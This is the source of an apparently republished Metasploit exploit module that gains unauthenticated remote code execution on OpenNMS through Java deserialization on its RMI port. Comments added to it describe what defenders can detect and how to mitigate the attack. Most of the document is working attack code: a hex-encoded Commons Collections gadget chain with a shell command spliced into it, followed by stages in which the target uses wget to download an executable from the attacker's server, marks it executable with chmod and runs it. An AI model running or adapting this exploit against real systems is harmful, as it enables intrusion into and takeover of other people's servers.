OpenNMS Java Object Unserialization Remote Code Execution
Posted on 19 October 2016
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit remote exploit module aimed at the Java RMI endpoint of OpenNMS
# (RPORT defaults to 1099 below). It abuses unsafe Java object deserialization,
# as described in the FoxGlove reference listed under 'References'.
#
# Flow as written: exploit -> wget_payload -> chmod_payload -> exec_payload.
# Each stage calls exec_command, which opens a fresh RMI connection and sends
# one serialized object stream carrying exactly one shell command.
#
# Defender view of the artefacts this code produces on a target:
#   * inbound TCP to the RMI port carrying a "JRMI" header followed by a Java
#     serialization stream (magic AC ED 00 05) that names Commons Collections
#     functor classes (see exec_command);
#   * the service's JVM spawning `wget`, then `chmod +x`, then a file with a
#     3-7 letter alphabetic name under WRITABLEDIR ('/tmp/' by default);
#   * an outbound HTTP GET from the OpenNMS host to the sender's SRVHOST:SRVPORT.
# Mitigation: keep the RMI port unreachable from untrusted networks and remove
# the unsafe deserialization path (vendor fixes, deserialization filtering).
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Java::Rmi::Client
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE

  # Registers the module metadata (name, description, author, license,
  # reference, targets, disclosure date) and its two options.
  #
  # info - Hash of module info merged with the defaults below via update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenNMS Java Object Unserialization Remote Code Execution',
      'Description'    => %q( This module exploits a vulnerability in the OpenNMS Java object which allows an unauthenticated attacker to run arbitary code against the system. ),
      'Author'         =>
        [
          'Ben Turner <benpturner[at]yahoo.com>', # @benpturner
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/' ]
        ],
      # Both targets are Linux; only the payload architecture differs.
      'Targets'        =>
        [
          [ 'OpenNMS / Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
          [ 'OpenNMS / Linux x86_64', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 19 2014'
    )
    )

    register_options(
      [
        # 1099 is the port this module expects the RMI service on.
        Opt::RPORT(1099),
        # Directory on the target where the downloaded file is written;
        # optional (required flag is false), default '/tmp/'.
        OptString.new('WRITABLEDIR', [false, 'A writable directory on the host', '/tmp/'])
      ], self.class)
  end

  # Sends one shell command to the target inside a serialized Java object.
  #
  # cmd - String command line spliced into the serialized stream.
  #
  # The status line always says "Downloading the file", although this method
  # is also used for the chmod and execute stages.
  #
  # NOTE(review): the two literals are printed here without backslashes; each
  # xNN is presumably a \xNN byte escape in the upstream module. Read that way:
  #   data1 = 4a 52 4d 49 ("JRMI") 00 02 4b -- the RMI stream header.
  #   data2 = an endpoint record ("127.0.1.1"), then 50 and the Java
  #           serialization magic AC ED 00 05, followed by an object graph
  #           whose class names decode to
  #           sun.reflect.annotation.AnnotationInvocationHandler,
  #           org.apache.commons.collections.map.LazyMap and the functors
  #           ChainedTransformer / ConstantTransformer / InvokerTransformer,
  #           ending in java.lang.Runtime, "getRuntime" and "exec".
  # Those class names inside traffic to the RMI port are a usable detection
  # signature; legitimate RMI calls have no reason to carry them.
  #
  # The method gets no command output back: it only checks that the peer
  # acknowledged the RMI header, then sends the object and disconnects. Its
  # value is that of the last expression in the begin block.
  def exec_command(cmd)
    vprint_status("#{peer} - Downloading the file #{cmd}")

    # Do the exploit command bit
    data1 = "x4ax52x4dx49x00x02x4b"
    data2 =
"x00x09x31x32x37x2Ex30x2Ex31x2Ex31x00x00x00x00x50xACxEDx00x05x77x22x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x44x15x4DxC9xD4xE6x3BxDFx74x00x05x70x77x6Ex65x64x73x7Dx00x00x00x01x00x0Fx6Ax61x76x61x2Ex72x6Dx69x2Ex52x65x6Dx6Fx74x65x70x78x72x00x17x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex72x65x66x6Cx65x63x74x2Ex50x72x6Fx78x79xE1x27xDAx20xCCx10x43xCBx02x00x01x4Cx00x01x68x74x00x25x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx72x65x66x6Cx65x63x74x2Fx49x6Ex76x6Fx63x61x74x69x6Fx6Ex48x61x6Ex64x6Cx65x72x3Bx70x78x70x73x72x00x32x73x75x6Ex2Ex72x65x66x6Cx65x63x74x2Ex61x6Ex6Ex6Fx74x61x74x69x6Fx6Ex2Ex41x6Ex6Ex6Fx74x61x74x69x6Fx6Ex49x6Ex76x6Fx63x61x74x69x6Fx6Ex48x61x6Ex64x6Cx65x72x55xCAxF5x0Fx15xCBx7ExA5x02x00x02x4Cx00x0Cx6Dx65x6Dx62x65x72x56x61x6Cx75x65x73x74x00x0Fx4Cx6Ax61x76x61x2Fx75x74x69x6Cx2Fx4Dx61x70x3Bx4Cx00x04x74x79x70x65x74x00x11x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx43x6Cx61x73x73x3Bx70x78x70x73x72x00x11x6Ax61x76x61x2Ex75x74x69x6Cx2Ex48x61x73x68x4Dx61x70x05x07xDAxC1xC3x16x60xD1x03x00x02x46x00x0Ax6Cx6Fx61x64x46x61x63x74x6Fx72x49x00x09x74x68x72x65x73x68x6Fx6Cx64x70x78x70x3Fx40x00x00x00x00x00x0Cx77x08x00x00x00x10x00x00x00x01x71x00x7Ex00x00x73x71x00x7Ex00x05x73x7Dx00x00x00x01x00x0Dx6Ax61x76x61x2Ex75x74x69x6Cx2Ex4Dx61x70x70x78x71x00x7Ex00x02x73x71x00x7Ex00x05x73x72x00x2Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex6Dx61x70x2Ex4Cx61x7Ax79x4Dx61x70x6ExE5x94x82x9Ex79x10x94x03x00x01x4Cx00x07x66x61x63x74x6Fx72x79x74x00x2Cx4Cx6Fx72x67x2Fx61x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2Fx63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Fx54x72x61x6Ex73x66x6Fx72x6Dx65x72x3Bx70x78x70x73x72x00x3Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex43x68x61x69x6Ex65x64x54x72x61x6Ex73x66x6Fx72x6Dx65x72x30xC7x97xECx28x7Ax97x04x02x00x01x5Bx00x0Dx69x54x72x61x6Ex73x66x6Fx72x6Dx65x72x73x74x00x2Dx5Bx4Cx6Fx72x67x2Fx61x70x61x63x68x65x2Fx63x6Fx6Dx6Dx6Fx6Ex73x2Fx63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Fx
54x72x61x6Ex73x66x6Fx72x6Dx65x72x3Bx70x78x70x75x72x00x2Dx5Bx4Cx6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex54x72x61x6Ex73x66x6Fx72x6Dx65x72x3BxBDx56x2AxF1xD8x34x18x99x02x00x00x70x78x70x00x00x00x05x73x72x00x3Bx6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex43x6Fx6Ex73x74x61x6Ex74x54x72x61x6Ex73x66x6Fx72x6Dx65x72x58x76x90x11x41x02xB1x94x02x00x01x4Cx00x09x69x43x6Fx6Ex73x74x61x6Ex74x74x00x12x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx70x78x70x76x72x00x11x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex52x75x6Ex74x69x6Dx65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x73x72x00x3Ax6Fx72x67x2Ex61x70x61x63x68x65x2Ex63x6Fx6Dx6Dx6Fx6Ex73x2Ex63x6Fx6Cx6Cx65x63x74x69x6Fx6Ex73x2Ex66x75x6Ex63x74x6Fx72x73x2Ex49x6Ex76x6Fx6Bx65x72x54x72x61x6Ex73x66x6Fx72x6Dx65x72x87xE8xFFx6Bx7Bx7CxCEx38x02x00x03x5Bx00x05x69x41x72x67x73x74x00x13x5Bx4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx4Fx62x6Ax65x63x74x3Bx4Cx00x0Bx69x4Dx65x74x68x6Fx64x4Ex61x6Dx65x74x00x12x4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx53x74x72x69x6Ex67x3Bx5Bx00x0Bx69x50x61x72x61x6Dx54x79x70x65x73x74x00x12x5Bx4Cx6Ax61x76x61x2Fx6Cx61x6Ex67x2Fx43x6Cx61x73x73x3Bx70x78x70x75x72x00x13x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx62x6Ax65x63x74x3Bx90xCEx58x9Fx10x73x29x6Cx02x00x00x70x78x70x00x00x00x02x74x00x0Ax67x65x74x52x75x6Ex74x69x6Dx65x75x72x00x12x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex43x6Cx61x73x73x3BxABx16xD7xAExCBxCDx5Ax99x02x00x00x70x78x70x00x00x00x00x74x00x09x67x65x74x4Dx65x74x68x6Fx64x75x71x00x7Ex00x24x00x00x00x02x76x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex53x74x72x69x6Ex67xA0xF0xA4x38x7Ax3BxB3x42x02x00x00x70x78x70x76x71x00x7Ex00x24x73x71x00x7Ex00x1Cx75x71x00x7Ex00x21x00x00x00x02x70x75x71x00x7Ex00x21x00x00x00x00x74x00x06x69x6Ex76x6Fx6Bx65x75x71x00x7Ex00x24x00x00x00x02x76x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx62x6Ax65x63x74x00x00x00x00x00x00x00x00x00x00x00x70x78x70x76x71x00x7Ex00x21x73x71x00x7Ex00x1Cx75x72x00x13x5Bx4Cx6Ax61x76x61x2Ex6Cx61x6Ex67x2E
x53x74x72x69x6Ex67x3BxADxD2x56xE7xE9x1Dx7Bx47x02x00x00x70x78x70x00x00x00x01x74x00"
    # The command is written with a single length byte (Integer#chr) in front
    # of it, directly after the "x74x00" that closes the literal above.
    data2 += cmd.length.chr
    data2 += cmd
    data2 += "x74x00x04x65x78x65x63x75x71x00x7Ex00x24x00x00x00x01x71x00x7Ex00x29x73x71x00x7Ex00x17x73x72x00x11x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex49x6Ex74x65x67x65x72x12xE2xA0xA4xF7x81x87x38x02x00x01x49x00x05x76x61x6Cx75x65x70x78x72x00x10x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Ex75x6Dx62x65x72x86xACx95x1Dx0Bx94xE0x8Bx02x00x00x70x78x70x00x00x00x01x73x71x00x7Ex00x09x3Fx40x00x00x00x00x00x10x77x08x00x00x00x10x00x00x00x00x78x78x76x72x00x12x6Ax61x76x61x2Ex6Cx61x6Ex67x2Ex4Fx76x65x72x72x69x64x65x00x00x00x00x00x00x00x00x00x00x00x70x78x70x71x00x7Ex00x3Fx78x71x00x7Ex00x3F"

    begin
      connect
      sock.put(data1)

      # Wait for the peer's acknowledgement of the RMI header; a nil result
      # is treated as "not an RMI service" and aborts the run.
      data = recv_protocol_ack # rescue nil
      unless data
        fail_with(Failure::Unknown, "This system has not responded with the correct RMI header")
      end

      # Send the serialized object that carries cmd
      sock.put(data2)

      # Close the connection; each command uses its own connection
      disconnect
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the host")
    end
  end

  # Stage 1: serves the generated executable over HTTP from this host and has
  # the target fetch it with wget into WRITABLEDIR.
  #
  # When SRVHOST is a wildcard address ("0.0.0.0" or "::"), the URL uses the
  # local source address that routes to rhost instead. The fixed 15 second
  # sleep gives the download time to finish; nothing confirms that it did.
  # On the target this appears as the OpenNMS JVM spawning `wget -P <dir> <url>`.
  def wget_payload
    resource_uri = '/' + @dropped_elf

    if datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::"
      srv_host = Rex::Socket.source_address(rhost)
    else
      srv_host = datastore['SRVHOST']
    end

    service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

    vprint_status("#{peer} - Starting up our web service on #{service_url} ...")
    # Only resource_uri is routed to on_request_uri.
    start_service(
      'Uri' => {
        'Proc' => proc { |cli, req| on_request_uri(cli, req) },
        'Path' => resource_uri
      }
    )

    exec_command("wget -P #{datastore['WRITABLEDIR']} #{service_url}")

    Rex.sleep(15)
  end

  # Stage 2: marks the downloaded file executable on the target.
  #
  # NOTE(review): `res` is whatever exec_command's last expression yields, not
  # a result reported by the target, so this check cannot detect a failed chmod.
  def chmod_payload
    cmd = "chmod +x #{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"

    vprint_status("#{peer} - Chmod the payload...")
    res = exec_command(cmd)

    fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload") unless res

    Rex.sleep(1)
  end

  # Stage 3: runs the downloaded file by its full path under WRITABLEDIR.
  #
  # NOTE(review): as in chmod_payload, `res` reflects only the local send path.
  def exec_payload
    cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)

    vprint_status("#{peer} - Executing the payload...")
    res = exec_command(cmd)

    fail_with(Failure::Unknown, "#{peer} - Unable to exec payload") unless res

    Rex.sleep(1)
  end

  # HTTP handler for the path registered in wget_payload: answers the request
  # with the generated executable. The request object itself is not inspected.
  def on_request_uri(cli, _request)
    vprint_status("#{peer} - Sending the payload to the server...")
    send_response(cli, generate_payload_exe)
  end

  # Entry point: picks a random alphabetic file name of 3 to 7 characters
  # (rand(5) + 3), then runs the download, chmod and execute stages in order.
  # @payload_url is initialised here but not read anywhere in this listing.
  def exploit
    print_status("#{peer} - Exploting the vulnerable service...")

    @payload_url = ''
    @dropped_elf = rand_text_alpha(rand(5) + 3)

    wget_payload
    chmod_payload
    exec_payload
  end
end